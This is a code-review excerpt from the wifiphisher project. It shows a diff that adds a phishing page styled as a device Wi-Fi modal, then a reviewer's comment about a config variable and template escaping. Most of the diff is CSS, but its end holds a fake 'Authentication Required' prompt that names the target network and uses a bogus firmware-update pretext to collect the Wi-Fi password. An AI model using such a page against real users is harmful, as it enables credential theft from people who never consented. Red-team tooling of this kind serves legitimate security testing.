wifiphisher/data/phishing-pages/device-modal/index.html

```diff
@@ -0,0 +1,694 @@
+		}
+		.ios .list-block .item-input {
+			width: 100%;
+			margin-top: -8px;
+			margin-bottom: -7px;
+			-webkit-box-flex: 1;
+			-ms-flex: 1;
+			-webkit-flex-shrink: 1;
+			-ms-flex: 0 1 auto;
+			flex-shrink: 1;
+		}
+		.ios .list-block input[type="time"], .ios .list-block input[type="number"], .ios .list-block input[type="search"], .ios .list-block input[type="text"], .ios .list-block input[type="password"], .ios .list-block input[type="email"], .ios .list-block input[type="tel"], .ios .list-block input[type="url"], .ios .list-block input[type="date"], .ios .list-block input[type="datetime-local"], .ios .list-block select, .ios .list-block textarea {
+			-webkit-appearance: none;
+			-moz-appearance: none;
+			-ms-appearance: none;
+			appearance: none;
+			box-sizing: border-box;
+			border: none;
+			background: 0 0;
+			border-radius: 0;
+			box-shadow: none;
+			display: block;
+			padding: 0;
+			margin: 0;
+			width: 100%;
+			height: 43px;
+			color: #000;
+			font-size: 17px;
+			font-family: inherit;
+		}
+		.ios a, input, select, textarea {
+			outline: 0;
+		}
+		.ios .list-block .item-inner::after {
+			content: '';
+			position: absolute;
+			left: 0;
+			bottom: 0;
+			right: auto;
+			top: auto;
+			height: 1px;
+			width: 100%;
+			background-color: #c8c7cc;
+			display: block;
+			z-index: 15;
+			-webkit-transform-origin: 50% 100%;
+			transform-origin: 50% 100%;
+		}
+		.ios .list-block ul {
+			list-style: none;
+		}
+		.ios .list-block {
+			font-size: 17px;
+		}
+		.ios .list-block ul::after {
+			content: '';
+			position: absolute;
+			left: 0;
+			bottom: 0;
+			right: auto;
+			top: auto;
+			height: 1px;
+			width: 100%;
+			background-color: #c8c7cc;
+			display: block;
+			z-index: 15;
+			-webkit-transform-origin: 50% 100%;
+			transform-origin: 50% 100%;
+		}
+		#demoform-2{
+			margin: 0;
+		}
+		.android .spoiler{
+			height: 20px;
+			width: 100%;
+			display: inline-block;
+		}
+		.displayNone{
+			display: none !important;
+		}
+	</style>
+
+	<link rel="stylesheet" type="text/css" href="./static/css/framework7.material.min.css">
+
+	<!-- Override framework7 material css -->
+	<style type="text/css">
+		.android .modal.modal-in{
+			margin-top: -153px !important;
+			box-shadow: 0 9px 38px rgba(0,0,0,.3),0 15px 12px rgba(0,0,0,.12);
+		}
+		.android label.label-checkbox i.icon-form-checkbox{
+			margin-left: 6px;
+		}
+		.android .list-block ul::before,
+		.android .list-block ul::after{
+			display: none !important;
+		}
+		.android .list-block .item-inner::after {
+			display: none !important;
+		}
+		.android .focus-state.error{
+			background: #F00 !important;
+		}
+		.android .modal-button.ok.inactive{
+			opacity: .35;
+			pointer-events: none;
+		}
+	</style>
+</head>
+<body>
+	<div class="container main hide">
+		<div class="window faded">
+			<h1>Authentication Required</h1>
+			<p>The network <span>{{ target_ap_essid }}</span> requires a password. The server says: Modem firmware was updated.</p>
```

Comment:
That part of the documentation was confusing, it wasn't until I read the very last paragraph on the bottom when I understood what to do.

**Regarding the header:**
Added `login_title` variable to config.ini file

**Regarding the paragraph:**
Can wifiphisher/tornado interpret {{ variables }} within the config.ini file? Sounds like it needs some escaping.